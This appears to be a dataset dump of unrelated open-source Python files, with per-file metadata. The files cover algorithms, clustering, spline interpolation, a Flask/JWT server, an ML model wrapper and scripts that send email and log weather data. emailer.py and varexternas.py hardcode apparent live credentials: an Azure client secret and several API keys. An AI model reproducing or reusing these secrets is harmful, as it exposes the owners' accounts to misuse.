seq_id
stringlengths 7
11
| text
stringlengths 156
1.7M
| repo_name
stringlengths 7
125
| sub_path
stringlengths 4
132
| file_name
stringlengths 4
77
| file_ext
stringclasses 6
values | file_size_in_byte
int64 156
1.7M
| program_lang
stringclasses 1
value | lang
stringclasses 38
values | doc_type
stringclasses 1
value | stars
int64 0
24.2k
⌀ | dataset
stringclasses 1
value | pt
stringclasses 1
value |
---|---|---|---|---|---|---|---|---|---|---|---|---|
706855437
|
def delit(a):
res = []
i = 1
while i * i < a + 1:
if a % i == 0:
res.append(i)
if i != a // i:
res.append(a // i)
i += 1
return sorted(res) # Возращает делители числа
print(delit(48))
|
Apersant1/Algorithms-for-EGE
|
task25INFO.py
|
task25INFO.py
|
py
| 281 |
python
|
ru
|
code
| 0 |
github-code
|
6
|
31111080784
|
#https://leetcode.com/problems/longest-consecutive-sequence/submissions/
"""
Q)Given an unsorted array of integers, find the length of the longest
consecutive elements sequence.
1)Iterate over the array
2)If the for every element i if i-1 is not in the set, make curr = 1,
and curr_streak = 1
3)If curr+1 is in set increment curr_streak
4)Update longest streak
Time Complexity: O(n)Amortised
Space Complexity: O(n)
"""
def longestConsecutive(nums):
num_set = set(nums)
longest_streak=0
for i in nums:
if i-1 not in num_set:
curr=i
curr_streak=1
while curr+1 in num_set:
curr+=1
curr_streak+=1
longest_streak=max(longest_streak, curr_streak)
return longest_streak
nums = [4,5,6,345,7,5,8,12,9]
print(longestConsecutive(nums))
|
sparsh-m/30days
|
d4_3.py
|
d4_3.py
|
py
| 830 |
python
|
en
|
code
| 0 |
github-code
|
6
|
8599562923
|
import webbrowser
import msal
import logging
import requests
import json
from msal import PublicClientApplication
APPLICATION_ID = '31a4641c-9cae-4d30-a2d4-c104bf383785'
CLIENT_SECRET = '5M78Q~QVl-rib2HqHVJ4xhRe-XWcGySwtZMgPbjz'
authority_url = 'https://login.microsoftonline.com/common/'
base_url = 'https://graph.microsoft.com/v1.0/'
endpoint = base_url + 'me'
SCOPES = ['User.Read', 'User.Export.All']
#
# # method 2: Login to acquire access_token
#
# client = PublicClientApplication(client_id=APPLICATION_ID,
# authority=authority_url)
#
# flow = client.initiate_device_flow(scopes=SCOPES)
# print(flow['user_code'])
# webbrowser.open(flow['verification_uri'])
#
# token_response = client.acquire_token_by_device_flow(flow)
# print(token_response['access_token'])
def email_sender(destinatario, nome_superior=None, nome_demitido=None, dt_demissao=None, modelo_equipamento=None, patrimonio_equipamento=None):
f = open('parameters.json')
config = json.load(f)
app = msal.ConfidentialClientApplication(
config["client_id"], authority=config["authority"],
client_credential=config["secret"],
# token_cache=... # Default cache is in memory only.
# You can learn how to use SerializableTokenCache from
# https://msal-python.rtfd.io/en/latest/#msal.SerializableTokenCache
)
# The pattern to acquire a token looks like this.
result = None
# Firstly, looks up a token from cache
# Since we are looking for token for the current app, NOT for an end user,
# notice we give account parameter as None.
result = app.acquire_token_silent(config["scope"], account=None)
if not result:
logging.info("No suitable token exists in cache. Let's get a new one from AAD.")
result = app.acquire_token_for_client(scopes=config["scope"])
if "access_token" in result:
# Calling graph using the access token
request_body = {
'message': {
# recipient list
'toRecipients': [
{
'emailAddress': {
'address': f'{destinatario}'
}
}
],
# email subject
'subject': 'TESTE - Transferência de Equipamentos',
'importance': 'normal',
'body': {
'contentType': 'HTML',
'content': f'<b>Prezado {nome_superior}, \n ex-colaborador:{nome_demitido} desligado em '
f'{dt_demissao}, favor 'f'transferir equipamento{modelo_equipamento},'
f' patrimônio {patrimonio_equipamento}'f' para outro colaborador ativo</b>'
},
}
}
graph_response = requests.post(config['endpoint'],
headers={'Authorization': 'Bearer ' + result['access_token']}, json=request_body)
print("Graph API call result: ")
print(graph_response)
else:
print(result.get("error"))
print(result.get("error_description"))
print(result.get("correlation_id")) # You may need this when reporting a bug
# request_body = {
# 'message': {
# # recipient list
# 'toRecipients': [
# {
# 'emailAddress': {
# 'address': '<recipient email address>'
# }
# }
# ],
# # email subject
# 'subject': 'You got an email',
# 'importance': 'normal',
# 'body': {
# 'contentType': 'HTML',
# 'content': '<b>Be Awesome</b>'
# },
# # include attachments
# 'attachments': [
# draft_attachment('hello.txt'),
# draft_attachment('image.png')
# ]
# }
# }
if __name__ == '__main__':
email_sender('[email protected]')
|
tvcastro1/projetos-analise-dados
|
citrix-podio/demitidos/emailer.py
|
emailer.py
|
py
| 3,963 |
python
|
en
|
code
| 0 |
github-code
|
6
|
5140782550
|
# Requirements:
# Device needs to lock on to their system
# Add subroutine to detect a start-of-the-packet marker
# Four chars that are all different
# Find number of characters from the beginning of the buffer to the end of first four-char marker
class DayFive:
def __init__(self):
text_file = open("../inputs/daySix.txt", 'r')
self.data = text_file.read()
text_file.close()
def say_state(self):
print("Data split {}".format(self.dataSplit))
def separate(self):
data_split = list(self.data)
n = 3
print("len(data_split) {}".format(len(data_split)))
print("data_split {}".format(data_split))
while n < len(data_split):
one = data_split[n - 3]
two = data_split[n - 2]
three = data_split[n - 1]
four = data_split[n]
print("values {} {} {} {}".format(one, two, three, four))
if one == two or one == three or one == four or two == three or two == four or three == four:
print("n {}".format(n))
else:
print("Result {}".format(n + 1))
return n
n += 1
def separate_two(self):
start = 0
end = start + 15
while end <= len(self.data):
data_split = list(self.data[start:end])
one = data_split[0]
two = data_split[1]
three = data_split[2]
four = data_split[3]
five = data_split[4]
six = data_split[5]
seven = data_split[6]
eight = data_split[7]
nine = data_split[8]
ten = data_split[9]
eleven = data_split[10]
twelve = data_split[11]
thirteen = data_split[12]
fourteen = data_split[13]
if one == two or one == three or one == four or one == five or one == six or one == seven or one == eight or one == nine or one == ten or one == eleven or one == twelve or one == thirteen or one == fourteen:
print("one {}".format(data_split))
elif two == three or two == four or two == five or two == six or two == seven or two == eight or two == nine or two == ten or two == eleven or two == twelve or two == thirteen or two == fourteen:
print("two {}".format(data_split))
elif three == four or three == five or three == six or three == seven or three == eight or three == nine or three == ten or three == eleven or three == twelve or three == thirteen or three == fourteen:
print("three {}".format(data_split))
elif four == five or four == six or four == seven or four == eight or four == nine or four == ten or four == eleven or four == twelve or four == thirteen or four == fourteen:
print("four {}".format(data_split))
elif five == six or five == seven or five == eight or five == nine or five == ten or five == eleven or five == twelve or five == thirteen or five == fourteen:
print("five {}".format(data_split))
elif six == seven or six == eight or six == nine or six == ten or six == eleven or six == twelve or six == thirteen or six == fourteen:
print("six {}".format(data_split))
elif seven == eight or seven == nine or seven == ten or seven == eleven or seven == twelve or seven == thirteen or seven == fourteen:
print("seven {}".format(data_split))
elif eight == nine or eight == ten or eight == eleven or eight == twelve or eight == thirteen or eight == fourteen:
print("eight {}".format(data_split))
elif nine == ten or nine == eleven or nine == twelve or nine == thirteen or nine == fourteen:
print("nine {}".format(data_split))
elif ten == eleven or ten == twelve or ten == thirteen or ten == fourteen:
print("ten {}".format(data_split))
elif eleven == twelve or eleven == thirteen or eleven == fourteen:
print("eleven {}".format(data_split))
elif twelve == thirteen or twelve == fourteen:
print("twelve {}".format(data_split))
elif thirteen == fourteen:
print("thirteen {}".format(data_split))
else:
print("Result {}".format(end - 1))
return end
start += 1
end += 1
if __name__ == '__main__':
day = DayFive()
print("Day five exercise!")
result = day.separate_two()
# print("Result".format(result))
|
nunenoriu/advent-of-code-2022
|
day01-10/daySix.py
|
daySix.py
|
py
| 4,579 |
python
|
en
|
code
| 0 |
github-code
|
6
|
9063496529
|
# -*- coding: utf-8 -*-
# ---
# @Software: PyCharm
# @Site:
# @File: num_clustering.py
# @Author: Alan D.Chen
# @E-mail: [email protected]
# @Time: 2020,八月 07
# ---
import pandas as pd
from sklearn.cluster import KMeans, MeanShift, AgglomerativeClustering, DBSCAN, spectral_clustering
from sklearn import metrics
from sklearn.metrics import calinski_harabasz_score
import matplotlib.pyplot as plt
from xml_extract2 import xml_extract
from DBSCAN2x import dbscanx
import numpy as np
from mean_shiftx import mean_shift
from k_meansx import mainx
from prettytable import PrettyTable
import math
path = '/home/alanc/Documents/faster-rcnn.pytorch-pytorch-1.0/data/VOCdevkit2007/VOC2007/Annotations'
m = num_items_selected = 500
Zdata = xml_extract(path, m)
## just for AgglomerativeClustering
linkages = ['ward', 'average', 'complete']
## just for spectral_clustering
##变换成矩阵,输入必须是对称矩阵
metrics_metrix = (-1 * metrics.pairwise.pairwise_distances(Zdata)).astype(np.int32)
metrics_metrix += -1 * metrics_metrix.min()
## SSE sum of the squared errors
sse_list = []
sse_list2 = []
sse_list3 = []
K = range(1, 15)
for k in range(1,15):
kmeans=KMeans(n_clusters=k)
kmeans.fit(Zdata)
sse_list.append([k, kmeans.inertia_, 0]) #model.inertia_返回模型的误差平方和,保存进入列表
# Calculate the slope difference between the two sides of a point #
for i in range(1,13):
sse_list[i][2] = (sse_list[i][1]-sse_list[i-1][1])/(sse_list[i][0]-sse_list[i-1][0]) - (sse_list[i+1][1]-sse_list[i][1])/(sse_list[i+1][0]-sse_list[i][0])
for i in range(len(sse_list)-1):
# 获得第一个元素,将其与剩余的元素进行比较,如果大于即交换位置
for j in range(i+1,len(sse_list)):
if sse_list[i][2]>sse_list[j][2]:
temp=sse_list[j]
sse_list[j]=sse_list[i]
sse_list[i]=temp
#print("The best number for K-means clustering by SSE(sum of the squared errors) is ", sse_list[0][0])
## 轮廓系数
## silhouette_score & Calinski-Harabaz Index
clusters = range(2,15)
sc_scores = []
sc_scores2 = []
ac_scores = []
ac_scores2 = []
pc_scores = []
pc_scores2 = []
for k in clusters:
kmeans_model = KMeans(n_clusters=k).fit(Zdata)
ac_model = AgglomerativeClustering(linkage=linkages[2], n_clusters=k).fit(Zdata)
pc_model = spectral_clustering(metrics_metrix, n_clusters=k)
sc_score = metrics.silhouette_score(Zdata, kmeans_model.labels_,sample_size=10000, metric='euclidean')
sc_scores.append([k, sc_score])
sc_score2 = metrics.calinski_harabasz_score(Zdata, kmeans_model.labels_)
sc_scores2.append([k, sc_score2])
## Agglomerative
ac_score = metrics.silhouette_score(Zdata, ac_model.labels_, sample_size=10000, metric='euclidean')
ac_scores.append([k, ac_score])
ac_score2 = metrics.calinski_harabasz_score(Zdata, ac_model.labels_)
ac_scores2.append([k, ac_score2])
## spectral_clustering
pc_score = metrics.silhouette_score(Zdata, pc_model, sample_size=10000, metric='euclidean')
pc_scores.append([k, pc_score])
pc_score2 = metrics.calinski_harabasz_score(Zdata, pc_model)
pc_scores2.append([k, pc_score2])
for i in range(len(sc_scores)-1):
# 获得第一个元素,将其与剩余的元素进行比较,如果小于即交换位置
for j in range(i+1,len(sc_scores)):
if sc_scores[i][1]<sc_scores[j][1]:
temp=sc_scores[j]
sc_scores[j]=sc_scores[i]
sc_scores[i]=temp
if sc_scores2[i][1] < sc_scores2[j][1]:
temp = sc_scores2[j]
sc_scores2[j] = sc_scores2[i]
sc_scores2[i] = temp
if ac_scores[i][1]<ac_scores[j][1]:
temp=ac_scores[j]
ac_scores[j]=ac_scores[i]
ac_scores[i]=temp
if ac_scores2[i][1] < ac_scores2[j][1]:
temp = ac_scores2[j]
ac_scores2[j] = ac_scores2[i]
ac_scores2[i] = temp
if pc_scores[i][1]<pc_scores[j][1]:
temp=pc_scores[j]
pc_scores[j]=pc_scores[i]
pc_scores[i]=temp
if pc_scores2[i][1] < pc_scores2[j][1]:
temp = pc_scores2[j]
pc_scores2[j] = pc_scores2[i]
pc_scores2[i] = temp
# if sc_scores3[i][1] < sc_scores3[j][1]:
# temp = sc_scores3[j]
# sc_scores3[j] = sc_scores3[i]
# sc_scores3[i] = temp
num_cluster, cluster_ids = mean_shift(Zdata, 70.0)
num_cluster_dbscanx = dbscanx(path, m)
# #print(sc_scores)
# print("The best number for K-means clustering by Silhouette Coefficient is ", sc_scores[0][0])
# #print(sc_scores2)
# print("The best number for K-means clustering by Calinski-Harabaz Index is ", sc_scores2[0][0])
#
# #print(ac_scores)
# print("The best number for Agglomerative clustering by Silhouette Coefficient is ", ac_scores[0][0])
# #print(ac_scores2)
# print("The best number for Agglomerative clustering by Calinski-Harabaz Index is ", ac_scores2[0][0])
#
# #print(pc_scores)
# print("The best number for Spectral clustering by Silhouette Coefficient is ", pc_scores[0][0])
# #print(pc_scores2)
# print("The best number for Spectral clustering by Calinski-Harabaz Index is ", pc_scores2[0][0])
#
# print("The best number for DBSCAN clustering is ", num_cluster_dbscanx)
num_clusterx = (sse_list[0][0] + sc_scores[0][0] + sc_scores2[0][0] + ac_scores[0][0] + ac_scores2[0][0]
+ pc_scores[0][0] + pc_scores2[0][0] + num_cluster_dbscanx)/8
num_clusterx = int(math.ceil(num_clusterx))
#################################
x = PrettyTable(["Method for clustering", "Automatic presentation", "SSE(sum of the squared errors)", "Silhouette Coefficient", "Calinski-Harabaz Index"])
x.align["Method for clustering"] = "l" # Left align city names
x.padding_width = 1 # One space between column edges and contents (default)
x.add_row(["K-means/PAM",0,sse_list[0][0],sc_scores[0][0],sc_scores2[0][0]])
x.add_row(["Hierarchical",0, 0,ac_scores[0][0],ac_scores2[0][0]])
x.add_row(["Spectral",0,0,pc_scores[0][0],pc_scores2[0][0]])
x.add_row(["DBSCANx",num_cluster_dbscanx,0,0,0])
x.add_row(["Mean-shift", num_cluster, 0, 0,0])
print(x)
print("Based on the above information, the following suggestions by the clustering system are : \n ")
nx, centerx = mainx(num_clusterx)
print("Plan 1:\n", "Number of clusters(K-means/PAM):",nx,"\n Cluster center:")
for l in range(len(centerx)):
print(centerx[l])
print("Plan 2:\n", "Number of clusters(mean shift):",num_cluster,"\n Cluster center:")
for l in range(len(cluster_ids)):
print(cluster_ids[l])
|
Alan-D-Chen/CDIoU-CDIoUloss
|
anchor_generater/num_clustering.py
|
num_clustering.py
|
py
| 6,580 |
python
|
en
|
code
| 25 |
github-code
|
6
|
2894455012
|
import numpy as np
import matplotlib.pyplot as plt
def gaussEliminationLS( m, n, a, x):
for i in range(m-1):
for k in range(m):
if abs(a[i][i]<abs(a[k][i])):
for j in range(n):
temp= a[i][j]
a[i][j]= a[k][j]
a[k][j]= temp
for k in range(i+1,m):
term = a[k][i]/a[i][i]
for j in range(n):
a[k][j]= a[k][j]-term*a[i][j]
for i in range(m-1,-1,-1):
x[i] = a[i][n-1]
for j in range(i+1,n-1):
x[i] = x[i]-a[i][j]*x[j]
x[i]= x[i]/a[i][i]
return x
def cSCoeffCalc(n,h,sig,y,a,b,c,d):
for i in range(n):
d[i]=y[i]
b[i]=sig[i]/2.0
a[i]=(sig[i+1]-sig[i])/(h[i]*6.0)
c[i]=(y[i+1]-y[i])/h[i]-h[i]*(2*sig[i]+sig[i+1])/6.0
def tridiagonalCubicSplineGen(n,h,a,y):
for i in range(n-1):
a[i][i]=2*(h[i]+h[i+1])
for i in range(n-2):
a[i][i+1]=h[i+1]
a[i+1][i]=h[i+1]
for i in range(1,n):
a[i-1][n-1]=(y[i+1]-y[i])*6/h[i]-(y[i]-y[i-1])*6/h[i-1]
def printMatrix(m, n, matrix):
ss=""
for i in range(m):
for j in range(n):
ss+=str(matrix[i][j])+" "
print(ss);
def copyMatrix( m, n, matrix1, matrix2):
for i in range(m):
for j in range(n):
matrix2[i][j]=matrix1[i][j]
#x= np.array([-3,-2 ,-1, 0, 1, 2, 3])
#y= np.array([-1, -1, -1, 0, 1, 1, 1])
x= np.array([0,1,2.5,3.6,5,7,8.1,10])
y= np.array([0,.8,.6,-.44,-.96,.66,.97,-.54])
m= x.shape[0]
n= m-1
h = np.zeros((n,1))
for i in range(n):
h[i]=x[i+1]-x[i]
a = np.zeros((n,1))
b = np.zeros((n,1))
c = np.zeros((n,1))
d = np.zeros((n,1))
sig = np.zeros((n+1,1))
sigTemp = np.zeros((n-1,1))
sig[0]=0
sig[n]=0
tri = np.zeros((n-1,n))
tridiagonalCubicSplineGen(n,h,tri,y)
print("The tridiagonal system for the Natural spline is:\n\n")
printMatrix(n-1,n,tri)
# Perform Gauss Elimination
gaussEliminationLS(n-1,n,tri,sigTemp)
for i in range(1,n):
sig[i]=sigTemp[i-1]
# Print the values of Si's
for i in range(n+1):
print("\nSig["+str(i)+"]= " +str(sig[i]))
# calculate the values of ai's, bi's, ci's, and di's
cSCoeffCalc(n,h,sig,y,a,b,c,d);
print("The equations of cubic interpolation polynomials between the successive intervals are:\n\n")
for i in range(n):
print("P"+str(i)+"(x) b/w ["+str(x[i])+","+str(x[i+1])+"] = "+str(a[i])+"*(x-"+str(x[i])+")^3+"+str(b[i])+"*(x-"+str(x[i])+")^2+"+str(c[i])+"*(x-"+str(x[i])+")+"+str(d[i])+"\n")
function = lambda x: (a[i]*(x-x[i])**3+b[i]*(x-x[i])**2+c[i]*(x-x[i])+d[i])
X= np.linspace(x[i],x[i+1])
plt.plot(X,function(X))
plt.show()
|
meheraj2325/CSE-3212-Numerical-Methods-Lab
|
lab4/cubic_spline2.py
|
cubic_spline2.py
|
py
| 2,688 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30763331030
|
import sys
import torch
import ool.picture.models.thirdparty.space.model as spc
from ool.picture.models.thirdparty.space.model import Space
from oolexp import OOLLayeredBoxExp
class MultipleOptimizer(torch.optim.Optimizer):
def __init__(self, *optimisers):
self.opts = optimisers
self.defaults = self.opts[0].defaults
self.state = self.opts[0].state
self.param_groups = []
for opt in self.opts:
self.param_groups.extend(opt.param_groups)
def __getstate__(self):
return {
'defaults': self.defaults,
'state': self.state,
'param_groups': self.param_groups,
}
def __setstate__(self, state):
self.__dict__.update(state)
def __repr__(self):
return f"Multi:{' '.join(str(opt) for opt in self.opts)}"
def state_dict(self):
return {
'opts': [
opt.state_dict() for opt in self.opts
]
}
def load_state_dict(self, state_dict):
for opt, sd in zip(self.opts, state_dict['opt']):
opt.load_state_dict(sd)
def zero_grad(self, set_to_none: bool = False):
for opt in self.opts:
opt.zero_grad(set_to_none)
def step(self, closure):
for opt in self.opts:
opt.step(closure)
def add_param_group(self, param_group):
raise NotImplementedError()
class LitSPACE(OOLLayeredBoxExp):
def __init__(self,
tag='test',
seed=None,
data='clevr-crop-(128, 128)',
batch_size=16,
grad_clip=1.0,
# learning_rate=1e-4,
max_steps=160000,
fg_std = 0.15,
bg_std = 0.15,
):
super(LitSPACE, self).__init__(seed, 'mse', 'min')
self.save_hyperparameters()
spc.arch.fg_sigma = fg_std
spc.arch.bg_sigma = bg_std
self.model = Space()
def training_step(self, batch, batch_idx):
batch = self.accelated_batch_postprocessing(batch)
img, *other = batch
output = self.model(img, self.trainer.global_step)
self.maybe_log_training_outputs(output)
return output['loss']
def configure_optimizers(self):
adam = torch.optim.Adam(list(self.model.bg_module.parameters()), lr=1e-3)
rms = torch.optim.RMSprop(list(self.model.fg_module.parameters()), lr=1e-5)
return MultipleOptimizer(rms, adam)
# def trainer_kwargs(self):
# return dict(accumulate_grad_batches=3)
def validation_step(self, batch, batch_idx, dataloader_idx=None):
prefix = '' if dataloader_idx is None else f"v{dataloader_idx}/"
batch = self.accelated_batch_postprocessing(batch)
img, *other = batch
output = self.model(img, self.trainer.global_step)
self.maybe_log_validation_outputs(batch, batch_idx, output, prefix)
if __name__ == '__main__':
print(' '.join(sys.argv))
LitSPACE.parse_args_and_execute()
|
karazijal/clevrtex
|
experiments/space.py
|
space.py
|
py
| 3,054 |
python
|
en
|
code
| 8 |
github-code
|
6
|
39567195381
|
def main(filepath):
with open(filepath) as file:
rows = [int(x.strip())for x in file.readlines()]
for i in range(25,len(rows)):
condition_met = False
for j in range(i-25,i):
for k in range(i-25,i):
if (rows[k] + rows[j]) == rows[i] and not rows[k] == rows[j]:
condition_met = True
if not condition_met:
b_target = rows[i]
print("Part a solution: "+ str(b_target))
break
for i in range(len(rows)):
for j in range(i,len(rows)):
if sum(rows[i:j]) == b_target and not len(rows[i:j])==1:
print("Part b solution: "+ str(max(rows[i:j])+min(rows[i:j])))
|
Burntmace/AdventOfCode2020
|
AOC-2020/days/nine.py
|
nine.py
|
py
| 727 |
python
|
en
|
code
| 0 |
github-code
|
6
|
6972201686
|
import os
import argparse
#from tools import train_net
from tools.lib import init_lr
import random
import numpy as np
from tools.classification import classification
from tools.classification_multi import classification_multi
import torch
def seed_torch(seed=0):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
#torch.backends.cudnn.enabled = False
seed_torch(0)
root_path = os.getcwd() #'/data2/lqm/pytorch_interpretable/py_icnn'
parser = argparse.ArgumentParser('parameters')
#info:gpu
parser.add_argument('--gpu_id',type=int,default=0,help='select the id of the gpu')
#info:task
parser.add_argument('--task_name',type=str,default='classification',help='select classification or classification_multi')
parser.add_argument('--task_id',type=int,default=0,help='0,1,2..')
parser.add_argument('--dataset',type=str,default='voc2010_crop',help='select voc2010_crop, helen, cub200,cubsample'
'celeba, vocpart, ilsvrcanimalpart')
parser.add_argument('--imagesize',type=int,default=224,help='')
parser.add_argument('--label_name',type=str,default='bird',help='if voc2010_crop, set bird, cat, cow, dog, horse or sheep;'
'else, it does not matter')
parser.add_argument('--label_num',type=int,default=1,help='keep the same number of label_name')
parser.add_argument('--model',type=str,default='resnet_18',help='select vgg_vd_16, vgg_m, vgg_s, '
'alexnet, resnet_18, resnet_50, densenet_121')
parser.add_argument('--losstype',type=str,default='logistic',help='select logistic or softmax')
#info:hyper-parameter
parser.add_argument('--batchsize',type=int,default=8,help='select more than 8 may cause out of cuda memory, '
'when you want to choose different batchsize, you also need to adjust line 94 of /tools/sgd.py at the same time to make them consistent')
parser.add_argument('--dropoutrate',type=int,default=0,help='select the number between 0 and 1')
parser.add_argument('--lr',type=int,default=0,help='see function init_lr in /tools/lib.py for details')
parser.add_argument('--epochnum',type=int,default=0,help='see function init_lr in /tools/lib.py for details')
parser.add_argument('--weightdecay',type=int,default=0.0005,help='0.02,0.002')
parser.add_argument('--momentum',type=int,default=0.09,help='0.02,0.002')
args = parser.parse_args()
args.lr, args.epochnum = init_lr(args.model,args.label_num,args.losstype) #init lr and epochnum
if(args.task_name=='classification'):
if args.dataset == 'celeba':
args.label_num = 40
classification(root_path, args)
else:
if args.dataset == 'vocpart':
args.label_name = ['bird','cat','cow','dog','horse','sheep']
args.label_num = 6
classification_multi(root_path,args)
|
ada-shen/ICNN
|
demo.py
|
demo.py
|
py
| 3,178 |
python
|
en
|
code
| 59 |
github-code
|
6
|
3438970081
|
class Solution:
def minCostII(self, costs: List[List[int]]) -> int:
k = len(costs[0])
dp1 = [0] * k
dp2 = [0] * k
smallest1 = [0] * 2
smallest2 = [sys.maxsize] * 2
for cost in costs:
for i in range(k):
if dp1[i] == smallest1[1]:
dp2[i] = cost[i] + smallest1[0]
else:
dp2[i] = cost[i] + smallest1[1]
if dp2[i] <= smallest2[1]:
smallest2[0] = smallest2[1]
smallest2[1] = dp2[i]
elif dp2[i] < smallest2[0]:
smallest2[0] = dp2[i]
dp1 = dp2
dp2 = [0] * k
smallest1 = smallest2
smallest2 = [sys.maxsize] * 2
return min(dp1)
|
cuiy0006/Algorithms
|
leetcode/265. Paint House II.py
|
265. Paint House II.py
|
py
| 833 |
python
|
en
|
code
| 0 |
github-code
|
6
|
20804943026
|
import pickle
from sklearn import model_selection
from sklearn.linear_model import LinearRegression
model = LinearRegression()
loaded_model = pickle.load(open('model', 'rb'))
val = "sssfAfsDfe%%%{dInIisdChdh*e]DHSdbeTNhfhdyeSSWTTFSSSllfjdjs{\\#3fdas34df7adJHHstcsdDFur3sfj_1mdfneypcs0KJDsrsFs7sd4nfec3_sdrufdl35}453"
print(len(val))
res = ""
for pos, i in enumerate(loaded_model.coef_):
print(i)
if i == 1:
res += val[pos]
print(res)
print(len(loaded_model.coef_))
print(loaded_model)
|
MysterionRise/ai-ctf-2022-solutions
|
stegano-regression/stegano.py
|
stegano.py
|
py
| 502 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73486867709
|
'''
@Jailson
Data: 17-11-2022
'''
import requests
from csv import writer
from datetime import datetime
data_e_hora_atuais = datetime.now()
data_e_hora_em_texto = data_e_hora_atuais.strftime('%d/%m/%Y %H:%M')
#################################################################################
# Emon service info
emon_ip = "193.136.227.157"
emon_apikey = "95ca8292ee40f87f6ff0d1a07b2dca6f" # emon ecopool
node_id = "ecopool"
##################################################################################
API_KEY = "23ffbe727b2bee451d3dc7b37ad2b813"
API_KEY_PRO = "5c27c543425c4d4a1efc3c6bee965937"
cidade = "faro"
code = "351"
link = "https://api.openweathermap.org/data/2.5/forecast?q="+str(cidade)+"&appid="+str(API_KEY)
def main():
requisicao = requests.get(link) # faz a requisição para o site(api)
requisicao_dic = requisicao.json() # armazena os valores solicitado num dicionario
print(requisicao_dic)
temp = requisicao_dic['list'][0]['main']['temp'] - 273.15
humidade = requisicao_dic['list'][0]['main']['humidity']
veloc_vent = ((requisicao_dic['list'][0]['wind']['speed']) / (1000)) * 3600
velocidade = '{:.0f}'.format(veloc_vent)
temperatura = '{:.0f}'.format(temp)
#print(temperatura,velocidade,humidade)
# enviar para emoncms
data_json = '{"TemperaturaExt":' + str(temperatura) + ',"HumidadeExt":' + str(humidade) + ',"VelocidadeExt":' + str(velocidade) +'}'
emon_link = 'http://' + emon_ip + '/emoncms/input/post?node=' + node_id + '&fulljson=' + str(data_json) + "&apikey=" + str(emon_apikey)
request = requests.get(emon_link)
# enviar para arquivo csv
# The data assigned to the list
list_data = [data_e_hora_em_texto,temperatura, velocidade, humidade]
with open('files/files.csv', 'a', newline='') as f_object:
# Pass the CSV file object to the writer() function
writer_object = writer(f_object)
# Result - a writer object
# Pass the data in the list as an argument into the writerow() function
writer_object.writerow(list_data)
# Close the file object
f_object.close()
if __name__ == "__main__":
main()
|
marcelo-m7/EcoPool
|
varexternas.py
|
varexternas.py
|
py
| 2,070 |
python
|
en
|
code
| 0 |
github-code
|
6
|
31534411526
|
characters = input()
command = input()
while command != "End":
command = command.split()
the_command = command[0]
if the_command == "Translate":
char = command[1]
replacement = command[2]
if char in characters:
characters = characters.replace(char, replacement)
print(characters)
elif the_command == "Includes":
substring = command[1]
if substring in characters:
print("True")
elif substring not in characters:
print("False")
elif the_command == "Start":
substring = command[1]
if characters[:len(substring)] == substring:
print("True")
else:
print("False")
elif the_command == "Lowercase":
characters = characters.lower()
print(characters)
elif the_command == "FindIndex":
char = command[1]
index = characters.rfind(char)
print(index)
elif the_command == "Remove":
start_index = int(command[1])
count = int(command[2])
characters = characters.replace(characters[start_index:start_index+count], "")
print(characters)
command = input()
|
iliyan-pigeon/Soft-uni-Courses
|
programming_fundamentals_python/exams/fundamentals_the_final_exam/string_manipulator.py
|
string_manipulator.py
|
py
| 1,188 |
python
|
en
|
code
| 0 |
github-code
|
6
|
23748731008
|
# !/usr/bin/env python
# -*- coding: utf-8 -*-
"""Entry point for the server application."""
import json
import logging
import traceback
from datetime import datetime
from flask import Response, jsonify, current_app
from flask_jwt_simple import (JWTManager, jwt_required, get_jwt_identity, get_jwt)
from gevent.wsgi import WSGIServer
from backend.flask_app.api.user import user
from backend.flask_app.api.home import home
from .factory import create_app, create_user
from .http_codes import Status
logger = logging.getLogger(__name__)
app = create_app()
jwt = JWTManager(app)
@app.before_first_request
def init():
"""Initialize the application with defaults."""
create_user(app)
@jwt.jwt_data_loader
def add_claims_to_access_token(identity):
"""Explicitly set identity and claims for jwt."""
print("identita data loader %s" % identity)
if identity == '[email protected]':
roles = 'admin'
else:
roles = 'user'
now = datetime.utcnow()
return {
'exp': now + current_app.config['JWT_EXPIRES'],
'iat': now,
'nbf': now,
'sub': identity,
'roles': roles
}
def main():
"""Main entry point of the app."""
try:
port = 8080
ip = '0.0.0.0'
http_server = WSGIServer((ip, port), app,log=logging,error_log=logging)
print("Server started at: {0}:{1}".format(ip, port))
http_server.serve_forever()
except Exception as exc:
# logger.error(exc.message)
logger.exception(traceback.format_exc())
finally:
# Do something here, vykresleni nejakeho mainu
pass
@app.route('/', methods=['GET'])
def test_connection():
ret = {'msg': 'Is okey'}
return jsonify(ret), 200
app.register_blueprint(user, url_prefix='/api/user')
app.register_blueprint(home, url_prefix='/api/home')
|
zIPjahoda/Flask-Angular
|
backend/flask_app/server.py
|
server.py
|
py
| 1,852 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16312489701
|
from flask import Blueprint, render_template, request, flash, redirect
shared_file = Blueprint('shared_file', __name__)
@shared_file.route('/')
def get__():
from models import File, User
files = File.query.filter(File.shared).all()
users = list(User.get_by(id_=file.creator_id) for file in files)
list_ = list((file.filename, user.username) for file, user in zip(files, users))
return render_template('shared_file.html', list=list_)
@shared_file.route('/download')
def get__download():
from models import User, File
try:
filename = request.args.get('filename')
assert filename, 'missing filename'
username = request.args.get('username')
assert username, 'missing username'
type_ = request.args.get('type')
assert type_, 'missing type'
assert type_ in ('encrypted', 'signature'), 'unknown type'
user = User.get_by(username=username)
return File.download_file(user, filename, type_)
except AssertionError as e:
message = e.args[0] if len(e.args) else str(e)
flash('下载失败!' + message)
return redirect('/shared_file')
|
TheMasterOfMagic/ac
|
views/shared_file.py
|
shared_file.py
|
py
| 1,156 |
python
|
en
|
code
| 1 |
github-code
|
6
|
20844418825
|
import tensorflow as tf
def multiclass_non_max_suppression(
boxes, scores, score_threshold,
iou_threshold, max_boxes_per_class):
"""Multi-class version of non maximum suppression. It operates independently
for each class. Also it prunes boxes with score less than a provided
threshold prior to applying NMS.
Arguments:
boxes: a float tensor with shape [N, num_classes, 4].
scores: a float tensor with shape [N, num_classes].
score_threshold: a float number.
iou_threshold: a float number.
max_boxes_per_class: an integer,
maximum number of retained boxes per class.
Returns:
selected_boxes: a float tensor with shape [M, 4],
where 0 <= M <= max_boxes_per_class * num_classes.
selected_scores: a float tensor with shape [M].
selected_classes: an int tensor with shape [M]. .
"""
